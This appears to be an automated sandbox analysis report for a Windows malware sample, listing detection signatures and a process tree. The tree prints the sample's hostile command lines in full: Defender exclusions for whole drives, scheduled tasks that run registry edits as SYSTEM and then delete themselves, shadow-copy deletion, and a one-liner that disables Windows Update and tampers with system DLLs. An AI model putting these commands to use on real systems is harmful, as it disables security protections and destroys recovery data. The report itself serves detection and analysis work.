Analysis

  • max time kernel
    132s
  • max time network
    153s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    15/08/2026, 02:11

General

  • Target
    appinst_up001.exe
  • Size 36.8MB
  • Sample260815-cmkynadd27
  • SHA256 f85800765c841a1fb77733fae681168d8aaf05856b8a1366617ec1a00fd948bd
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 16 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 1 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 18 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 27 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\appinst_up001.exe
    "C:\Users\Admin\AppData\Local\Temp\appinst_up001.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:7108
  • C:\Users\Public\gWKVEw\VAzRLL.exe
    "C:\Users\Public\gWKVEw\VAzRLL.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2672
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:5852
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\gWKVEw\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:6004
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\gWKVEw\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:5980
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:4088
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:3028
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:204
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4792
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:1852
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:3044
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:3312
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:5152
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:1088
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:5560
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:6316
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1656
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:704
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:3168
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:5332
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:5296
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:4324
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:992
                        • C:\Program Files (x86)\kdZdbo\GD1czk.exe
                          "C:\Program Files (x86)\kdZdbo\GD1czk.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:6208
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:3888
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:6528
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\kdZdbo" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5496
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:4376
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4640
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\kdZdbo\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1712
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\kdZdbo\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:3120
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:3092
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Delete /TN "Task1" /F
                              4⤵
                                PID:720
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                              3⤵
                              • Executes a command shell one-liner
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:3456
                              • C:\Windows\SysWOW64\net.exe
                                net stop wuauserv
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5160
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop wuauserv
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1776
                              • C:\Windows\SysWOW64\sc.exe
                                sc config wuauserv start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:6132
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure wuauserv reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                PID:6104
                              • C:\Windows\SysWOW64\net.exe
                                net stop UsoSvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:4132
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop UsoSvc
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4316
                              • C:\Windows\SysWOW64\sc.exe
                                sc config UsoSvc start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:5476
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure UsoSvc reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:3332
                              • C:\Windows\SysWOW64\net.exe
                                net stop uhssvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:3468
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop uhssvc
                                  5⤵
                                    PID:6792
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config uhssvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:5156
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure uhssvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:4396
                                • C:\Windows\SysWOW64\net.exe
                                  net stop WaaSMedicSvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:1236
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop WaaSMedicSvc
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:6596
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config WaaSMedicSvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:1836
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure WaaSMedicSvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:1516
                                • C:\Windows\SysWOW64\takeown.exe
                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1248
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3176
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1956
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:6588
                                • C:\Windows\SysWOW64\takeown.exe
                                  takeown /f C:\Windows\System32\wuaueng.dll
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5752
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:5844
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3044
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:6576
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:556
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1656
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                  4⤵
                                    PID:2676
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4764
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  3⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:3452
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\kdZdbo" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:5744
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:6788
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\kdZdbo" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:3444
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo\GD1czk.exe" /inheritance:r
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:6112
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\kdZdbo\GD1czk.exe" /inheritance:r
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:3768
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  • Suspicious use of WriteProcessMemory
                                  PID:6008
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:5384
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3684
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2304
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo\GD1czk.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:6532
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\kdZdbo\GD1czk.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:4960
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo\GD1czk.exe" /grant:r Users:(RX) /deny Users:(DE)
                                  3⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:4884
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\kdZdbo\GD1czk.exe" /grant:r Users:(RX) /deny Users:(DE)
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:3328
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo\image.png" /inheritance:r
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  PID:1332
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\kdZdbo\image.png" /inheritance:r
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1760
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:4204
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\kdZdbo\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:1552
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:4468
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\kdZdbo\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1212
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo\thumbs.db" /inheritance:r
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:4284
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\kdZdbo\thumbs.db" /inheritance:r
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:5936
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  • System Location Discovery: System Language Discovery
                                  PID:3780
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1276
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4496
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3028
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  PID:4832
